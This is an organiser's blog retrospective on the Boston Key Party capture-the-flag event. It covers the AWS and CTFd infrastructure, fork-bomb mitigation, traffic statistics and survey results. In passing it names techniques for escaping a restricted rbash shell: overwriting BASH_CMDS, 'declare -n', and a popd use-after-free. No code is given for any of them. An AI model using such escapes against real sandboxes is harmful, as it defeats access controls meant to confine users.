This year, like the two previous one, I had the please to give a hand with the organisation of the Boston Key Party, a (hopefully) fun 48 hours long capture the flag event, serving as a qualification for the (prestigious) Defcon one.
Last year, crowell and Amat wrote a really good-looking scoreboard, but it had some performances issues (protip: don't use ncurses on a forking server with several thousand simultaneous users). This is why (and also because we wanted to have more people that could easily administer the scoreboard) this year we went with CTFd, with a (super-ghetto) custom theme (that I wrote in a hurry, mostly with tears and stress.).
The whole infrastructure was hosted on AWS:
It's cheap (the whole CTF costed us 73USD), comes with a
CDN (to palliate CTFd
asthmatic behaviour), a WAF to
block the DDoS attack (proudly powered by Wordpress
that hit the scoreboard around 02am (Paris time) Saturday, and it's dead simple
to spawn new machines and to write them together.
Since I'm not über-proficient sysadmin, it was a fun opportunity to learn
stuff like "How to manage fork bombs done by a single linux user, used by
several hundred people at the same time?" Having a nice
prevent your machine from burning to the ground, but it won't prevent people
from maxing the number of processes, prevent others from logging in.
Fortunately, one just have to do something like
echo '1 * * * * root killall
-u ctfuser -s SIGKILL --older-than 5' >> /etc/crontab to kill processes older
than 5 minutes. Someone mumbled something about using
cgroups, but failed to
go any further with it.
Thanks to amazon, we have some random/mildly interesting numbers about the ctf and the players:
- 43% of the requests to our infrastructure were from the USA, 6% from Korea, 6% from France, 4% from Japan and 4% from the Netherlands.
- We suffered from several DDoS tentatives.
- We served around 335GB of data in 48h, split in 2.5M http requests and 65K https ones.
- A lot of people tried a fake flag for vimjail, found in
- A bit less than 1300 teams registered, and something like 1000 of them scored at least one point.
- A bit more than 3000 wrong flags were submitted, and 2000 good ones, for our 23
challenges. We should throttle the number of flag submission next year,
and agree on a flag format (some challs were using
- Congratulations to HITCON, b1o0p and PPP for ranking respectively first, second and third.
Along with ensuring that every single task was up, running correctly, and could
be managed by anyone in the team (mostly by yelling on Slack at people to get
them do document their challenges) and
telling random jokes in broken
English doing support on irc,
I also wrote 3 different challenges:
A couple of weeks ago, I was discussing with nurfed,
about how we could improve a bit the 26th level of
websec.fr, and he mentioned
but thought that everyone was already sitting on private escapes, since he
personally had several ones.
I wanted to check if this was true, so I did a simple challenge based on this:
rbash! In total, 30 teams managed, in 48h, to find various 0days to
escape from a
rbash shell, in a chroot with only
rbash, and a
/fag/showFlag binary (along with the required library to make those run of
course.). The fact that the challenge was in a super-small chroot killed a lot
of various exploits that would have worked otherwise. So it seems that nurfed
was wrong: not everyone had (or was willing to use)
I was also wondering if people would be willing to burn their 0days in
writeups/ on irc, or would be wise enough to stack them. On the other hand,
since no one cares about
rbash escapes, things would likely have been a bit
different with more interesting/used sandboxes.
The intended solution was
PATH isn't writeable, but
BASH_CMDS is.), but a team
found another one
declare -n. Someone told me
that at least one team went completely overkill and wrote a working
exploit of a use after free
popd to escape to sandbox.
Sorry nurfed about people finding your escapes, but I'm sure that you still got working ones ;)
A bit more than 10 years ago (damn.) I bought a Sansa e200v2, and slapped Rockbox on it, it was amazing! Now that I know some C, I thought that it would make a great challenge to write a crackme plugin for it! You can find its source code here, and the whole archive here.
We ran a small survey (powered by google forms, sorry), and this is what I retain from it:
~60%of the surveyed found that difficulty just right,
~40%found it too hard, and
- Solitary Confinement was the most hated challenge ♥
~75%of the surveyed thought that 48h is the right duration.
~25%of the surveyed didn't joined the irc channel, and
~80%of them wanted to have updates via the website. We should address this point for next year.
I have a dump of some of the challenges, feel free to hit me if you forgot to download your favourite one.
I hope that everyone enjoyed playing it as much as we enjoyed holding the Boston Key Party, see you next year!